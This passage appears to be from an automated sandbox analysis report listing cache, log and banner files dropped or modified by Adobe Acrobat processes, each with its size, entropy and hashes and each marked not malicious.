Entropy (8bit): | 0.08207059579331169 |
Encrypted: | false |
SSDEEP: | 3:lYerHrFRyAt/57Dek3JvaFlqllEqW3l/TjzzQ/t:lzrHrFFR3tCFQmd8/ |
MD5: | 988BC999EA267B0FB555AE31B7E54446 |
SHA1: | D22ADA5F5931BE74710D88FB31E787D3905BB55F |
SHA-256: | 672475FF9BA3F1F93BB783E000CCA03B5D5D7D220BACB7688DC8E0B02BEF2166 |
SHA-512: | B1D611D1A8D770AE6398F73B51EAB6C4F9AEC7CE4BFB0CE3987650FF01C39A8C91B4365AB29CCE3CE354BC3B1BF8271B8A2BD72F9381B598291C3945DF06F68A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.235341672228195 |
Encrypted: | false |
SSDEEP: | 6:iOoVq2PcNwi2nKuAl9OmbnIFUtdgZmwrIkwOcNwi2nKuAl9OmbjLJ:7oVvLZHAahFUtdg/rI54ZHAaSJ |
MD5: | B6A24B5ABCFE85A631005444AF4CF334 |
SHA1: | 7BCC430A9B7FB1AFFD83CE94B6622ABCB432FE78 |
SHA-256: | FE86813D7C4396AF3536A18F9CC03D35CA4D613206A881498AD9318CFCBAF9D3 |
SHA-512: | C88A3FF028F5EAF4031DCEADC7BD6F116482A769D3EBBFC33E56A7CC8E33A5A655A31C531FC851A6C38FC5C7335751F5F2A44D8B9EFC41963DCF859628B80118 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.235341672228195 |
Encrypted: | false |
SSDEEP: | 6:iOoVq2PcNwi2nKuAl9OmbnIFUtdgZmwrIkwOcNwi2nKuAl9OmbjLJ:7oVvLZHAahFUtdg/rI54ZHAaSJ |
MD5: | B6A24B5ABCFE85A631005444AF4CF334 |
SHA1: | 7BCC430A9B7FB1AFFD83CE94B6622ABCB432FE78 |
SHA-256: | FE86813D7C4396AF3536A18F9CC03D35CA4D613206A881498AD9318CFCBAF9D3 |
SHA-512: | C88A3FF028F5EAF4031DCEADC7BD6F116482A769D3EBBFC33E56A7CC8E33A5A655A31C531FC851A6C38FC5C7335751F5F2A44D8B9EFC41963DCF859628B80118 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 341 |
Entropy (8bit): | 5.243522046970095 |
Encrypted: | false |
SSDEEP: | 6:iO83+q2PcNwi2nKuAl9Ombzo2jMGIFUtgZmwGCVkwOcNwi2nKuAl9Ombzo2jMmLJ:78OvLZHAa8uFUtg/G654ZHAa8RJ |
MD5: | 0D1D79196CE2F7A77B7603F1DC5D6138 |
SHA1: | 390F36DB5C8C17D40E1A354233613D886518DDD5 |
SHA-256: | FB59451BD68B3C7C88899511430E564648C59DA026B1DB790765E298FA33C191 |
SHA-512: | 947F53BA6411056E6DE005D4AAAC921070CA1C9C803F6F851D07F4EC87981548335C8C1C5F1593F04582E74DF46B7C568596ABE2063BEA2964D92546885EBA81 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 341 |
Entropy (8bit): | 5.243522046970095 |
Encrypted: | false |
SSDEEP: | 6:iO83+q2PcNwi2nKuAl9Ombzo2jMGIFUtgZmwGCVkwOcNwi2nKuAl9Ombzo2jMmLJ:78OvLZHAa8uFUtg/G654ZHAa8RJ |
MD5: | 0D1D79196CE2F7A77B7603F1DC5D6138 |
SHA1: | 390F36DB5C8C17D40E1A354233613D886518DDD5 |
SHA-256: | FB59451BD68B3C7C88899511430E564648C59DA026B1DB790765E298FA33C191 |
SHA-512: | 947F53BA6411056E6DE005D4AAAC921070CA1C9C803F6F851D07F4EC87981548335C8C1C5F1593F04582E74DF46B7C568596ABE2063BEA2964D92546885EBA81 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\54a1292a-da1c-4269-a93f-9057d85cabc6.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.954982522033707 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqkR/EsBdOg2HUHgcaq3QYiubSpDyP7E4TX:Y2sRds//dMHeL3QYhbSpDa7n7 |
MD5: | C113088E4442513E98C946DE600144EE |
SHA1: | 8857390BC7EC8489F6989FDA3435048D24CBB0B8 |
SHA-256: | A018280A4456C1383D586D42AFFFB5139B64A6E25D6D1E7A6975247B04727B68 |
SHA-512: | ECB09BA1B910AC9979B1994415E7E3C4688263775DEFCC0714E66998FDE6A510809CF225CBBBC9C2EA7682DA441A4AB3B7F8C4C4C9A780A895A2069128C65349 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.954982522033707 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqkR/EsBdOg2HUHgcaq3QYiubSpDyP7E4TX:Y2sRds//dMHeL3QYhbSpDa7n7 |
MD5: | C113088E4442513E98C946DE600144EE |
SHA1: | 8857390BC7EC8489F6989FDA3435048D24CBB0B8 |
SHA-256: | A018280A4456C1383D586D42AFFFB5139B64A6E25D6D1E7A6975247B04727B68 |
SHA-512: | ECB09BA1B910AC9979B1994415E7E3C4688263775DEFCC0714E66998FDE6A510809CF225CBBBC9C2EA7682DA441A4AB3B7F8C4C4C9A780A895A2069128C65349 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.237560012083013 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP24fAZj:CwNw1GHqPySfkcigoO3h28ytPVfAZj |
MD5: | 97E404D56BE66413744AFED21AC22290 |
SHA1: | 5474960DEEC22AB05483E38E01BBD10E21FB72CB |
SHA-256: | 1677E32B2E16F9B31EE84CE352D0648F0075219B9853C1B5C8D6DD976E949148 |
SHA-512: | B4BE7199F6036D1A631C4C39F143502878E777EDD8F7752F9B5E392B09CEC98EB93ECC0FE142F47727B5A07F46ADC69211A4312E589D6C41B9DB6E2DE759FD89 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 329 |
Entropy (8bit): | 5.213957033637363 |
Encrypted: | false |
SSDEEP: | 6:iOC+q2PcNwi2nKuAl9OmbzNMxIFUtWFZZmwrNm3VkwOcNwi2nKuAl9OmbzNMFLJ:7TvLZHAa8jFUtCZ/rNmF54ZHAa84J |
MD5: | 8B9D9EAA08FF243D83D9A69C389E93DB |
SHA1: | A675972CA18A1FBAD622C7CB63DFED10B3227A12 |
SHA-256: | 6AB5D99771E29A3FDAD1531C9DB9E6909694946E94488E5A9A6635BF065C26AC |
SHA-512: | 01C618170CA8F0E57C04A8CC17DD8DCEFD08FB0A0AC87548A56A76A5C4CBBDF7374B33AD4A63074970E4060BBC40C3FB907167A76216B9358A92E2FBDA25FE53 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 329 |
Entropy (8bit): | 5.213957033637363 |
Encrypted: | false |
SSDEEP: | 6:iOC+q2PcNwi2nKuAl9OmbzNMxIFUtWFZZmwrNm3VkwOcNwi2nKuAl9OmbzNMFLJ:7TvLZHAa8jFUtCZ/rNmF54ZHAa84J |
MD5: | 8B9D9EAA08FF243D83D9A69C389E93DB |
SHA1: | A675972CA18A1FBAD622C7CB63DFED10B3227A12 |
SHA-256: | 6AB5D99771E29A3FDAD1531C9DB9E6909694946E94488E5A9A6635BF065C26AC |
SHA-512: | 01C618170CA8F0E57C04A8CC17DD8DCEFD08FB0A0AC87548A56A76A5C4CBBDF7374B33AD4A63074970E4060BBC40C3FB907167A76216B9358A92E2FBDA25FE53 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438447462819455 |
Encrypted: | false |
SSDEEP: | 384:SeJci5G4iBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:eUurVgazUpUTTGt |
MD5: | 63E8DB6988435F69D626A4C5F874774C |
SHA1: | 0518F9FF12BB5FC3C1B4AFB8AAD59DF5731EB924 |
SHA-256: | 6A19CE7104C663C50D30700806D49F40F46C389D0BA6190539BBA9EDF8EBDE63 |
SHA-512: | 314DD1F50830AA78DDBA5EAC48592C1E24738C6F8057B88B47BF91490CE568B53CFCE395DC5E556FADFECFFFA0F41001D18D2FA885BD6F7E427A1744E145E433 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213760229914003 |
Encrypted: | false |
SSDEEP: | 24:7+ttJ6wKeqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MzZ:7MnWeqvmFTIF3XmHjBoGGR+jMz+LhD0 |
MD5: | 9B5039132F54EAC22D71B0436A308D98 |
SHA1: | 657BA18D9AB45FDE0B61181EBF418EA46601ACA0 |
SHA-256: | B3C4C2FE35FF30A3C6822232A2F00D77D10C0ACACB62A3548C54FBEC6B667DA6 |
SHA-512: | F4C8916AAF05A3E1D2CEDA615B4290EE6439FB5A4F284A39CE053638E542FC32EE78E2363C99BD8316726CDEBBAE34B5A4D0B437B8FF54DBCBD80020E24E9E0D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFklQpqbNttfllXlE/HT8kKllltNNX8RolJuRdxLlGB9lQRYwpDdt:kKJkbPeT8bdNMa8RdWBwRd |
MD5: | 3C4DA43867C85D0050D24010F3FDABB3 |
SHA1: | B0117FD6D2CC9A9737D83D4DC921EDF5C589015A |
SHA-256: | 215E337121CBF1C956CB28FE61E17AD1FD5D16C9D40084E1507DCABC491FBD2D |
SHA-512: | 4E29B6D1B5C9FEBE0A8B2EBB85AD0E3BD2AC4CBC6110FD901C2EF811845A4B7BF85D2B83C00C247348C2447E4C2CF9164BA065965D6CBAAD12B594EC19F42DAE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.1391791584200512 |
Encrypted: | false |
SSDEEP: | 6:kKWnM/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:0siDnLNkPlE99SNxAhUe/3 |
MD5: | 1629230CC1F50323878D8A9F357BADFD |
SHA1: | 524C3A6720F1ABA63AF009368EBDFDDF0637EB93 |
SHA-256: | 714F56CDA9B5E3918C7E1254F08DE18499C2408FD5280C1EE8DCD15D40B5E5B0 |
SHA-512: | 4558D9A814CBCCAE155076E82A34F1041C87429BD5BE0AC4F83D7D587E6DC3FBBB8D460BEE6039C354A3E1BA54C513B67EC947430855FDB8F179FE3B12C36424 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3931364965759965 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJM3g98kUwPeUkwRe9:YvXKXIoJImGRsdTeOPGMbLUkee9 |
MD5: | 4A7D1225B9B270F561E6136B4865826A |
SHA1: | EAA99E2CE8E2D9EDF72F7FAD70A4B3A11C0D3395 |
SHA-256: | 0FCFCCDB3F0E7910C1F5A30B2E411E6D1D466FA7592FE5D2630871179BB25554 |
SHA-512: | 5200A27AD0C8190DD1CE7806A09A50D4658C05DA4A9AEA57C3836413EB6EF7E57BAD5C65B7FE6740B08C3229ECD79AA95428D404F34C65C9DF3E986004D4608B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.332822973514685 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfBoTfXpnrPeUkwRe9:YvXKXIoJImGRsdTeOPGWTfXcUkee9 |
MD5: | 09115ABA151F10537F7E44E54CB635D5 |
SHA1: | 842E330E77C6DB85040122FD300726CF30E7B34F |
SHA-256: | AC751F6F90D0251D8B8C245120B9E1E17656A9DD9A2A504EFC09F7636D1964F3 |
SHA-512: | B01E3812CD94B1417C41351518E276A69C479C27E9365CABE7EE66E8A9B9317CE63A38C518BBF8949B7A8D2469047129FC8F61C36210C747088E8BA7EB70513A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.311713826125442 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfBD2G6UpnrPeUkwRe9:YvXKXIoJImGRsdTeOPGR22cUkee9 |
MD5: | 6545ACA886FEB63ECDF9E72D17F78C9C |
SHA1: | 4CC5B99EA2F08A4827D853E466870E59B0903C09 |
SHA-256: | 1A3E80A10F0CBAE5923632CB45EA67D73CC5156EFE0F70C769C69956885A5F25 |
SHA-512: | 83BB49104511A3E07AA61B0A0C1A9C0DD5CE275168F2D234CF447D92A283B406F04FF0AAB6E4B75BBD084D5209278F5F91AF4A86056408145D1CBD917870DE88 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.38105947026621 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfPmwrPeUkwRe9:YvXKXIoJImGRsdTeOPGH56Ukee9 |
MD5: | 2F71D7B03DD9B58308642813521C7E0C |
SHA1: | 413A6570C2285E2687C44FEBC39AEE7E6E73BBA6 |
SHA-256: | 150D45040D0FBFCA3B4CF46E5D534EE44C6591887DA835E0C83964845757E42F |
SHA-512: | 0F689F7131DBB0CF788563FFD5673CAED52ADD7245840E2CFE0CB144D84EBA0E4EBD6B5EF4332A31BE4FF530E6C6A30345CC519EB9172C7F65D235A8B3611AD6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.69580089207369 |
Encrypted: | false |
SSDEEP: | 24:Yv6X8mqmeOUpLgE9cQx8LennAvzBvkn0RCmK8czOCCSd:Yvk5ePhgy6SAFv5Ah8cv/d |
MD5: | 6B74C3026AA4426BB37184AD3F4D42F9 |
SHA1: | FD9CDDA439432CA3B4B513792A49B1419F76D39B |
SHA-256: | 8635E3D999ACC5183FCEBF2A1AB49A9F24070049B66BA5183A689BC8ADFF321D |
SHA-512: | C97ADFD477D0934931C97887ED43DA4D41311D15186AECDE944B282DDA6D3541EFF76A87340F159F04413C7D7E75624238D0FA44E7B4627A3FC020A697D62BB9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.319331819522851 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJf8dPeUkwRe9:YvXKXIoJImGRsdTeOPGU8Ukee9 |
MD5: | 5F1E17E66F8D27E062C7FE897283339A |
SHA1: | 2DBD5E97A0E15C9352A00FF0CF035AC142606FEB |
SHA-256: | B78254EED93878617EF0E8214C64244488FC3D178670450AC6998721785B3295 |
SHA-512: | 964C07D68FE01AFCF8AB448217648CB9B0A376E7F136730A78BA836722CBDDC7F1717EA8BA2411795E5D38532BD8B4B5E5BE4020440724D425A3D832B97EECFD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.323633637339876 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfQ1rPeUkwRe9:YvXKXIoJImGRsdTeOPGY16Ukee9 |
MD5: | A1BB9BF722190C0A92EF439965C60394 |
SHA1: | 1A8527A8C3392FAC7D2E2073781F8C1030BD82D7 |
SHA-256: | DBD3A6E97A49C75CB28AA9391FDB0D8A4966AD59D01B04EFFBDCEE138FB78E2A |
SHA-512: | 893643FA49B797C2656FF5BD41D85137F7EEC780FEAC4D669D63F42AFC6504631B6DFD98426D4522875A6D03767EDE670F93454B9A225667C477C73C35EF35CF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.337737170453589 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfFldPeUkwRe9:YvXKXIoJImGRsdTeOPGz8Ukee9 |
MD5: | 8C6F765EFD8EF699EAF7F19FD1E2E0B4 |
SHA1: | 7A88AD63E36A82FD52C43FFE97806E63AA0310C2 |
SHA-256: | 949199C7F651DA61CDBA3A9BCACC8E6D8096CF061161380A300093A4194E43CC |
SHA-512: | 7277CE5C9581222C322F92BF1815BEC24879AB0112DD3CFF588773C4B75297C2EDC78A419B443ECAD2240A56094974E312E1884101B2A7955E945DBC17598AB9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.344630003259763 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfzdPeUkwRe9:YvXKXIoJImGRsdTeOPGb8Ukee9 |
MD5: | F66AFCF556892A0AE938BF0BFE112310 |
SHA1: | 3C0C1880898616E05B97D3D4BD9AAECD7CC94FA3 |
SHA-256: | 95FEE01512B52E5F9C38567B124CA7A870E9C375FE2D82D2FCCA95C4315749FA |
SHA-512: | 6DD175570AE92104A671CF9A88F0C94F7329C946837FC9B1A4B0F3A8232A28141101F98E830AFAA9066564EDCD22A9A995EAC34972E771C32F4754DCEF7A022B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.325798307604547 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfYdPeUkwRe9:YvXKXIoJImGRsdTeOPGg8Ukee9 |
MD5: | 6496F387949C8EEEF9A66EFB6CFA05C0 |
SHA1: | 40698E2497253977B7189039A7E4E951AE7AF581 |
SHA-256: | B03A5B58ECA747869C8CF9CA1DB4B4A9DA38F4209F975A937F8709DEFC68E6D8 |
SHA-512: | E052D9377E2A44BC485FA68CE8D09640D3E1EFE13720B26147676B6396DB0D313FF683B86C769E48CA8E13AEC5EBFB7AF9FC0983C915570F1D3D3A4DA3420CE1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.311985174450798 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJf+dPeUkwRe9:YvXKXIoJImGRsdTeOPG28Ukee9 |
MD5: | 944FCFAC473C8EADC2E8AB2C3B06DC2B |
SHA1: | 8D807986FC6DD99A686399A47FE961A268A35568 |
SHA-256: | 467002F7EC0E2B3ED8622200B823FFC34187FE2656B88918D50D519D795ED741 |
SHA-512: | B8F47007CF11708A77DBD65D2BB98708EDFA478CA5266F8C707EAE896DC4DE42DAB6CFA616D7A7BA0C095B6243C65986D96FD3948E7E0AB25C87C5A733F0381E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.309168097322366 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfbPtdPeUkwRe9:YvXKXIoJImGRsdTeOPGDV8Ukee9 |
MD5: | 39A84496CD409E23BBE1985014FFA25B |
SHA1: | 0AA67B665EFA58645759197DD85EC4A305E814BE |
SHA-256: | 3F17BBCCD8D91C31022D65ED8BB46D583569B469F60A1E26940BF58E11304E6F |
